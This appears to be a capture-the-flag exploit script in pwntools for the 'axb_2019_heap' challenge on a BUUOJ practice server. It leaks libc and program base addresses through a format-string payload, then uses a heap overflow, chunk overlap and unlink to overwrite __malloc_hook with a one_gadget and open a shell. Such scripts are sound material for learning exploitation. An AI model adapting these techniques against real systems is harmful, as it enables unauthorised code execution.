from pwn import *context.log_level = "debug"
context.arch = "amd64"
context.os = "linux"
context.terminal = ["tmux", "splitw", "-h"]elf = ELF("./axb_2019_heap")
libc = ELF("./libc-2.23.so")
# p = gdb.debug("./axb_2019_heap")
# p = process("./axb_2019_heap")
p = remote("node5.buuoj.cn", 27535)def add(index, size, content):p.sendlineafter(b">> ", b"1")p.sendlineafter(b"Enter the index you want to create (0-10):", str(index).encode())p.sendlineafter(b"Enter a size:\n", str(size).encode())p.sendlineafter(b"Enter the content: \n", content)def delete(index):p.sendlineafter(b">> ", b"2")p.sendlineafter(b"Enter an index:\n", str(index).encode())def show():p.sendlineafter(b">> ", b"3")passdef edit(index, content):p.sendlineafter(b">> ", b"4")p.sendlineafter(b"Enter an index:\n", str(index).encode())p.sendlineafter(b"Enter the content: \n", content)p.sendlineafter(b"Enter your name: ", b"%15$p,%14$p")p.recvuntil(b"Hello, ")
leak = int(p.recvuntil(b",")[:-1], 16)
log.success(f"leak: {hex(leak)}")
libc.address = leak - 0x20830
log.success(f"libc: {hex(libc.address)}")leak = int(p.recvline().strip(), 16)
log.success(f"leak: {hex(leak)}")
elf.address = leak - 0x1200
log.success(f"elf: {hex(elf.address)}")add(0, 0x98, b"a" * 0x80)
add(1, 0x108, b"b" * 0x80)
add(2, 0xF8, b"c" * 0x80)
add(3, 0xF0, b"padding")
add(5, 0x100, b"padding2")delete(0)
edit(1, b"b" * 0x100 + p64(0x1B0))
delete(2)note_ptr = elf.symbols["note"] + 0x10payload = b"d" * 0x90
payload += (p64(0x100)+ p64(0x111)+ p64(0x20)+ p64(0x101)+ p64(note_ptr - 0x18)+ p64(note_ptr - 0x10)+ b"d" * 0xE0
)
payload += p64(0x100) + p64(0x100) + b"d" * 0xF0
payload += p64(0x200)
add(4, 0x2A8, payload)
delete(3)# edit(1, p64(0) * 3 + p64(elf.sym["key"]))
# edit(1, p64(43))edit(1, p64(0) * 3 + p64(libc.symbols["__malloc_hook"]))
edit(1, p64(libc.address + 0xf1147))
add(6, 0x100, b"qaq")p.interactive()
